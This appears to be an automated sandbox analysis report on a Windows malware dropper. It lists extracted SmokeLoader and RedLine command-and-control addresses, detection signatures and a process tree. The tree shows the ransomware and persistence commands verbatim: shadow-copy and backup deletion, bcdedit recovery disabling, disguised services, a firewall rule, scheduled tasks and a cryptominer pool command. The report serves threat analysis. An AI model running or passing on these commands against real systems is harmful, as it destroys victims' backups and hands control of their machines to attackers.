Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    20-09-2021 14:30

General

  • Target

    272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad.exe

  • Size

    269KB

  • MD5

    bb4a97f08b6da5bff18ae40873fa88fd

  • SHA1

    ca7d5866ff9fedc021251901377583610e8b42f5

  • SHA256

    272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad

  • SHA512

    347ceec8a1d65a6cba2e5c119dff19db7056a230eeb0110260414bb14d06a629e8071f35deb522e9ba15538b44e4ffc570f3b9f568966a164bbf85fe5bdcf920

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://venerynnet1.top/

http://kevonahira2.top/

http://vegangelist3.top/

http://kingriffaele4.top/

http://arakeishant5.top/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

installbv

C2

80.85.137.89:17954

Extracted

Family

redline

Botnet

Moneymaker

C2

185.244.217.166:56316

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • MedusaLocker

    Ransomware with several variants first seen in September 2019.

  • MedusaLocker Payload 1 IoCs
  • Modifies WinLogon for persistence 2 TTPs 15 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 2 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Deletes System State backups 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 12 IoCs
  • Executes dropped EXE 22 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 21 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 32 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 42 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 64 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 54 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Interacts with shadow copies 2 TTPs 13 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 10 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad.exe
    "C:\Users\Admin\AppData\Local\Temp\272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:908
    • C:\Users\Admin\AppData\Local\Temp\272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad.exe
      "C:\Users\Admin\AppData\Local\Temp\272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:368
  • C:\Users\Admin\AppData\Local\Temp\E337.exe
    C:\Users\Admin\AppData\Local\Temp\E337.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2584
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\epmxxskb\
      2⤵
        PID:3848
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\eqckkvks.exe" C:\Windows\SysWOW64\epmxxskb\
        2⤵
          PID:3920
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create epmxxskb binPath= "C:\Windows\SysWOW64\epmxxskb\eqckkvks.exe /d\"C:\Users\Admin\AppData\Local\Temp\E337.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3168
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description epmxxskb "wifi internet conection"
            2⤵
              PID:3604
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start epmxxskb
              2⤵
                PID:2656
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1000
              • C:\Users\Admin\AppData\Local\Temp\F23B.exe
                C:\Users\Admin\AppData\Local\Temp\F23B.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:3252
              • C:\Windows\SysWOW64\epmxxskb\eqckkvks.exe
                C:\Windows\SysWOW64\epmxxskb\eqckkvks.exe /d"C:\Users\Admin\AppData\Local\Temp\E337.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2576
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:1244
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1388
              • C:\Users\Admin\AppData\Local\Temp\3A2.exe
                C:\Users\Admin\AppData\Local\Temp\3A2.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:3152
              • C:\Users\Admin\AppData\Local\Temp\E80.exe
                C:\Users\Admin\AppData\Local\Temp\E80.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:512
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\E80.exe"
                  2⤵
                    PID:276
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /T 10 /NOBREAK
                      3⤵
                      • Delays execution with timeout.exe
                      PID:4884
                • C:\Users\Admin\AppData\Local\Temp\2351.exe
                  C:\Users\Admin\AppData\Local\Temp\2351.exe
                  1⤵
                  • Executes dropped EXE
                  PID:2984
                • C:\Users\Admin\AppData\Local\Temp\485E.exe
                  C:\Users\Admin\AppData\Local\Temp\485E.exe
                  1⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Modifies extensions of user files
                  • Adds Run key to start application
                  • Drops desktop.ini file(s)
                  • Enumerates connected drives
                  • Drops file in System32 directory
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Suspicious use of WriteProcessMemory
                  • System policy modification
                  PID:2776
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=401MB
                    2⤵
                    • Interacts with shadow copies
                    PID:4156
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=unbounded
                    2⤵
                    • Interacts with shadow copies
                    PID:4920
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4164
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=unbounded
                    2⤵
                    • Executes dropped EXE
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4620
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4776
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4176
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4536
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4572
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:1672
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4584
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4412
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4992
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Delete Shadows /All /Quiet
                    2⤵
                    • Interacts with shadow copies
                    PID:5000
                  • C:\Windows\SYSTEM32\bcdedit.exe
                    bcdedit.exe /set {default} recoveryenabled No
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3852
                  • C:\Windows\SYSTEM32\bcdedit.exe
                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1664
                  • C:\Windows\SYSTEM32\wbadmin.exe
                    wbadmin DELETE SYSTEMSTATEBACKUP
                    2⤵
                    • Deletes System State backups
                    • Drops file in Windows directory
                    PID:5044
                  • C:\Windows\SYSTEM32\wbadmin.exe
                    wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                    2⤵
                    • Deletes System State backups
                    • Drops file in Windows directory
                    PID:4220
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      3⤵
                        PID:5000
                    • C:\Windows\System32\Wbem\wmic.exe
                      wmic.exe SHADOWCOPY /nointeractive
                      2⤵
                        PID:4172
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\485E.exe >> NUL
                        2⤵
                          PID:1200
                      • C:\Users\Admin\AppData\Local\Temp\5233.exe
                        C:\Users\Admin\AppData\Local\Temp\5233.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4216
                        • C:\ProgramData\ZZZZZ.exe
                          "C:\ProgramData\ZZZZZ.exe"
                          2⤵
                            PID:4488
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c start C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                              3⤵
                                PID:4536
                                • C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                                  C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                                  4⤵
                                  • Modifies WinLogon for persistence
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Drops file in System32 directory
                                  • Drops file in Program Files directory
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4756
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fFW45rqrc4.bat"
                                    5⤵
                                      PID:4180
                                      • C:\Windows\system32\chcp.com
                                        chcp 65001
                                        6⤵
                                          PID:4960
                                        • C:\Windows\system32\w32tm.exe
                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                          6⤵
                                            PID:2812
                                          • C:\Windows\System32\PhotoScreensaver\winlogon.exe
                                            "C:\Windows\System32\PhotoScreensaver\winlogon.exe"
                                            6⤵
                                            • Modifies WinLogon for persistence
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            • Drops file in System32 directory
                                            • Modifies registry class
                                            PID:3852
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eHSya3ThPF.bat"
                                              7⤵
                                                PID:4692
                                                • C:\Windows\system32\chcp.com
                                                  chcp 65001
                                                  8⤵
                                                    PID:3884
                                                  • C:\Windows\system32\w32tm.exe
                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    8⤵
                                                      PID:2804
                                                    • C:\Boot\da-DK\ShellExperienceHost.exe
                                                      "C:\Boot\da-DK\ShellExperienceHost.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:2208
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c start C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                                            3⤵
                                              PID:4564
                                              • C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                                                C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                                                4⤵
                                                • Executes dropped EXE
                                                PID:4804
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
                                                  5⤵
                                                    PID:4768
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'
                                                      6⤵
                                                      • Creates scheduled task(s)
                                                      PID:4984
                                                  • C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4488
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
                                                      6⤵
                                                        PID:4744
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'
                                                          7⤵
                                                          • Creates scheduled task(s)
                                                          PID:1664
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4748
                                              • C:\Users\Admin\AppData\Local\Temp\5233.exe
                                                "C:\Users\Admin\AppData\Local\Temp\5233.exe"
                                                2⤵
                                                  PID:4620
                                                • C:\Users\Admin\AppData\Local\Temp\5233.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\5233.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:4632
                                              • C:\Windows\system32\vssvc.exe
                                                C:\Windows\system32\vssvc.exe
                                                1⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4272
                                              • C:\Users\Admin\AppData\Local\Temp\5A71.exe
                                                C:\Users\Admin\AppData\Local\Temp\5A71.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4456
                                                • C:\Users\Admin\AppData\Local\Temp\5A71.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\5A71.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:3664
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 1908
                                                  2⤵
                                                  • Program crash
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4668
                                              • C:\Users\Admin\AppData\Local\Temp\6177.exe
                                                C:\Users\Admin\AppData\Local\Temp\6177.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:4812
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /fdsfs
                                                  2⤵
                                                    PID:5056
                                                  • C:\Users\Admin\AppData\Local\Temp\6177.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\6177.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:5112
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 1228
                                                      3⤵
                                                      • Program crash
                                                      PID:4820
                                                • C:\Users\Admin\AppData\Local\Temp\6E78.exe
                                                  C:\Users\Admin\AppData\Local\Temp\6E78.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:4532
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\winlogon.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4524
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "F23B" /sc ONLOGON /tr "'C:\PerfLogs\F23B.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4148
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "5233" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\tmp6528\5233.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4352
                                                • C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\wuautoappupdate\winlogon.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:4368
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "VSSVC" /sc ONLOGON /tr "'C:\Windows\System32\rtmpal\VSSVC.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:4072
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\services.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:4180
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\DeviceElementSource\dllhost.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:4652
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\AppVTerminator\winlogon.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:4828
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\dmband\WerFault.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:260
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "6177" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20210408_121853935\6177.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:4216
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Boot\da-DK\ShellExperienceHost.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:4964
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "6E78" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\aria-debug-3324\6E78.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:4592
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:732
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "6177" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\sa.9WZDNCRFHVFW_0_0010_.Public.InstallAgent\6177.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:2464
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Public\Videos\wininit.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:2268

Network

MITRE ATT&CK Enterprise v6


Downloads
